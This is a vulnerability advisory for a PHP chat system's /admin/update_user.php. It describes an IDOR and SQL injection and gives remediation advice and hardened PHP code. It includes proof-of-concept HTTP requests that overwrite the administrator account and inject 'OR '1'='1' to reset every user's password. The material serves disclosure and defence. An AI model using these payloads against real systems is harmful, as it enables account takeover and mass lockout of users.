# Vulnerability Summary: VULN-004-idor-sqli-update-user.md

## Vulnerability Overview

This is a composite vulnerability involving **Insecure Direct Object Reference (IDOR)**, **SQL Injection (SQLi)**, and **Weak Password Hashing (MD5)**.

* **Affected Product**: Chat System Using PHP (v1.0)
* **Vulnerable File**: `/admin/update_user.php`
* **Trigger Method**: POST request with parameters `id` (IDOR), `name`, `username`, `password` (SQLi)
* **Core Logic**: An attacker can overwrite the information of any user (including administrators) by modifying the `id` parameter. Additionally, because the SQL query does not use prepared statements, the attacker can inject into the `WHERE` clause of the `UPDATE` statement so that it matches every row, batch-modifying the passwords of all users.

## Impact Scope

* **Complete Account Takeover**: Any authenticated user can overwrite the credentials of any account, including administrators.
* **Privilege Escalation**: Low-privilege users can reset administrator credentials to become administrators.
* **Password Leakage**: If an unchanged password is submitted, the database stores it in plaintext, leading to password leakage.
* **Mass Account Lockout**: By exploiting SQL injection, an attacker can modify the passwords of all users at once, preventing all users from logging in.

## Remediation

1. **Enforce Ownership Verification**: Ensure users can only update their own accounts (verify that `$_POST['id']` matches `$_SESSION['id']`).
2. **Use Prepared Statements**: Replace the raw query with `mysqli_prepare` and `bind_param` to prevent SQL injection.
3. **Strong Password Hashing**: Use `password_hash` (BCRYPT) instead of MD5, and use `password_verify` for verification.
4. **Remove Plaintext Fallback Logic**: Remove the code path that "stores plaintext if the password hasn't changed"; always hash the password.
5. **CSRF Token Verification**: Add a CSRF token to the form and verify it on the server side.
6. **Role-Based Access Control (RBAC)**: Restrict modifications to other users' accounts to administrators only.
7. **Secondary Verification for Sensitive Operations**: Require the entry of the current password before modifying the username or password.

## Proof of Concept (PoC)

### 1. Unauthorized Modification of a Single User (IDOR)

```http
POST /admin/update_user.php HTTP/1.1
Host: localhost:8081
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4d80cc7875c80d8dca3aa2092609f1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Referer: http://localhost:8081/admin/update_account.php
Connection: keep-alive

edit=1&id=1&name=Administrator&username=admin&password=attacker_new_password
```

### 2. Batch Modification of All Users' Passwords (SQL Injection)

```http
POST /admin/update_user.php HTTP/1.1
Host: localhost:8081
Content-Type: application/x-www-form-urlencoded
... (headers omitted for brevity) ...

edit=1&id=1' OR '1'='1&name=pwned&username=pwned&password=pwned
```

### 3. SQL Statement Executed on the Backend (After Injection)

```sql
UPDATE user SET uname='pwned', username='pwned', password=MD5('pwned') WHERE userid='1' OR '1'='1'
```
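The Remediation section above, as a hardened replacement handler for `/admin/update_user.php`. This is an added example, not the project's own code; it assumes a `mysqli` connection `$conn`, the `user` table columns shown in the backend SQL, a session that stores the caller's id in `$_SESSION['id']`, and an assumed `$_SESSION['role']`, `$_SESSION['csrf_token']` and `current_password` form field.

```php
<?php
// Added example, not the project's own code. Assumes a mysqli connection $conn, a `user` table
// with columns userid, uname, username, password (as in the page's SQL), and a session holding
// $_SESSION['id'], an assumed $_SESSION['role'] and a $_SESSION['csrf_token'] issued with the form.
session_start();

function can_edit_user(array $session, int $target_id): bool {
    // Ownership check (IDOR fix): a user may edit only their own row ...
    if (isset($session['id']) && (int)$session['id'] === $target_id) {
        return true;
    }
    // ... unless they hold the administrator role (RBAC).
    return ($session['role'] ?? '') === 'admin';
}

function update_user(mysqli $conn, int $id, string $name, string $username, string $password): bool {
    // Always hash with bcrypt: no MD5 and no "store plaintext if unchanged" fallback.
    $hash = password_hash($password, PASSWORD_BCRYPT);
    // Prepared statement: values are bound as data, never concatenated into the SQL,
    // so a payload such as id=1' OR '1'='1 cannot widen the WHERE clause.
    $stmt = $conn->prepare('UPDATE user SET uname = ?, username = ?, password = ? WHERE userid = ?');
    if ($stmt === false) { return false; }
    $stmt->bind_param('sssi', $name, $username, $hash, $id);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit'])) {
    // CSRF token check with a constant-time comparison.
    if (!isset($_POST['csrf_token'], $_SESSION['csrf_token'])
        || !hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'])) {
        http_response_code(403); exit('Invalid CSRF token');
    }
    $id = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT); // non-integer ids never reach the query
    if ($id === false || $id === null || !can_edit_user($_SESSION, $id)) {
        http_response_code(403); exit('Forbidden');
    }
    // Secondary verification: the caller must present their own current password (assumed field).
    $me = (int)$_SESSION['id'];
    $stmt = $conn->prepare('SELECT password FROM user WHERE userid = ?');
    $stmt->bind_param('i', $me);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if (!$row || !password_verify($_POST['current_password'] ?? '', $row['password'])) {
        http_response_code(403); exit('Current password incorrect');
    }
    echo update_user($conn, $id, $_POST['name'] ?? '', $_POST['username'] ?? '', $_POST['password'] ?? '') ? 'Updated' : 'Update failed';
}
```

Rows still holding MD5 digests will fail `password_verify`, so existing accounts need a rehash step (for example, on next successful login against the legacy hash) before the old column values can be retired.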